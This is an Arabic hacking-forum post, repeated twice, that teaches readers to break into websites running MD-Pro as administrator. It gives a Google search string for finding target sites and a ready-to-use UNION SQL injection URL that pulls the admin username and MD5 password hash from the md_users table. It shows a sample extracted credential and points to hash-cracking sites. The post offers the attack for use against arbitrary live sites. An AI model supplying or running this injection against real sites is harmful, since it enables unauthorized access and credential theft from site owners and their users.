الان أدخل كأدمن على مواقع "powered by MD-pro "
السلام عليكم
هناك طريقه سهله جدا للدخول
كأدمن في المواقع...
1-الخطوة الأولى : نذهب إلى google,yahoo و نضع
كود PHP:
"powered by md-pro"
ثم بحث.
2-الخطوة الثانية : إختر موقعا "يجب البحث على الموقع المناسب و هناك العديد"
كيف نعرف أن هذا الموقع مناسب?
نفتح أي موقع و نضيف هذه العبارة :
كود PHP:
/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*
و يجب الحصول على مثل هذه النتيجة
.و كما ترون
.admin=stefan
7aa9f13ab4cb39975b22d7d9cbe456fa=password
هناك العديد من الطرق لفك مثل هذه الرموز md5
إضغط هنا
http://gdataonline.com/seekhash.php
او
http://www.milw0rm.com/
الأن لديك كل ما يلزمك لدخول كأدمن!!!
كود:
www.[sitename].com/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*
والثغرة sql injection
بالموفقيه اخواااني ..
هناك طريقه سهله جدا للدخول
كأدمن في المواقع...
1-الخطوة الأولى : نذهب إلى google,yahoo و نضع
كود PHP:
"powered by md-pro"
ثم بحث.
2-الخطوة الثانية : إختر موقعا "يجب البحث على الموقع المناسب و هناك العديد"
كيف نعرف أن هذا الموقع مناسب?
نفتح أي موقع و نضيف هذه العبارة :
كود PHP:
/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*
و يجب الحصول على مثل هذه النتيجة
.و كما ترون
.admin=stefan
7aa9f13ab4cb39975b22d7d9cbe456fa=password
هناك العديد من الطرق لفك مثل هذه الرموز md5
إضغط هنا
http://gdataonline.com/seekhash.php
او
http://www.milw0rm.com/
الأن لديك كل ما يلزمك لدخول كأدمن!!!
كود:
www.[sitename].com/index.php?module=Topics&func=view&topicid=-1 UNION ALL SELECT null,null,concat(pn_uname,0x3a,pn_pass),null,null, null,null from md_users where pn_uid=2/*
والثغرة sql injection
بالموفقيه اخواااني ..
اسم الموضوع : الان أدخل كأدمن على مواقع "powered by MD-pro "
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات